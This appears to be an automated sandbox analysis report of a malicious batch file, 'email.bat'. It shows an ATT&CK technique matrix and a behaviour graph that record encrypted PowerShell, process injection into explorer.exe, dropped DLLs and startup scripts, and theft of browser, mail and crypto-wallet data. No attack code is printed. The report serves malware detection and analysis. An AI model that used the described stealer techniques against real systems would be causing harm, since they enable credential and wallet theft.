              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Masquerading              		Cached Domain Credentials1
              Application Window Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
              Virtualization/Sandbox Evasion              		DCSync1
              Remote System Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job312
              Process Injection              		Proc Filesystem1
              System Network Configuration Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1629935 Sample: email.bat Startdate: 05/03/2025 Architecture: WINDOWS Score: 100 79 34.26.8.0.in-addr.arpa 2->79 109 Malicious sample detected (through community Yara rule) 2->109 111 Multi AV Scanner detection for submitted file 2->111 113 Yara detected Generic Stealer 2->113 115 18 other signatures 2->115 13 cmd.exe 1 2->13         started        signatures3 process4 signatures5 123 Suspicious powershell command line found 13->123 125 Encrypted powershell cmdline option found 13->125 127 Uses ping.exe to check the status of other devices and networks 13->127 129 PowerShell case anomaly found 13->129 16 powershell.exe 38 13->16         started        20 conhost.exe 13->20         started        process6 file7 67 C:\Users\user\AppData\...\mlbsu2za.cmdline, Unicode 16->67 dropped 69 C:\Users\user\AppData\Local\Phantom.ps1, ASCII 16->69 dropped 101 Found many strings related to Crypto-Wallets (likely being stolen) 16->101 103 Injects code into the Windows Explorer (explorer.exe) 16->103 105 Writes to foreign memory regions 16->105 107 Creates a thread in another existing process (thread injection) 16->107 22 explorer.exe 46 3 16->22 injected 26 cmd.exe 1 16->26         started        28 csc.exe 3 16->28         started        30 3 other processes 16->30 signatures8 process9 file10 71 C:\Users\user\...\DkkijTOJSHGJxxcmgeA.bat, ASCII 22->71 dropped 117 Drops script or batch files to the startup folder 22->117 119 Found many strings related to Crypto-Wallets (likely being stolen) 22->119 32 cmd.exe 1 22->32         started        35 PING.EXE 4 26->35         started        38 conhost.exe 26->38         started        73 C:\Users\user\AppData\Local\...\fhrgxrvn.dll, PE32 28->73 dropped 40 cvtres.exe 1 28->40         started        75 C:\Users\user\AppData\Local\...\mlbsu2za.dll, PE32 30->75 dropped 42 cvtres.exe 1 30->42         started        signatures11 process12 dnsIp13 85 Encrypted powershell cmdline option found 32->85 87 PowerShell case anomaly found 32->87 44 powershell.exe 12 32->44         started        46 conhost.exe 32->46         started        81 127.0.0.1 unknown unknown 35->81 83 213.209.150.200, 49734, 49735, 49737 KEMINETAL Germany 35->83 89 Tries to steal Mail credentials (via file / registry access) 35->89 91 Found many strings related to Crypto-Wallets (likely being stolen) 35->91 93 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 35->93 95 Tries to harvest and steal browser information (history, passwords, etc) 35->95 signatures14 process15 process16 48 powershell.exe 44->48         started        51 conhost.exe 44->51         started        signatures17 97 Writes to foreign memory regions 48->97 99 Creates a thread in another existing process (thread injection) 48->99 53 cmd.exe 48->53         started        55 csc.exe 48->55         started        58 taskkill.exe 48->58         started        process18 file19 60 PING.EXE 53->60         started        63 conhost.exe 53->63         started        77 C:\Users\user\AppData\Local\...\zozwmnym.dll, PE32 55->77 dropped 65 cvtres.exe 55->65         started        process20 signatures21 121 Tries to harvest and steal browser information (history, passwords, etc) 60->121

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.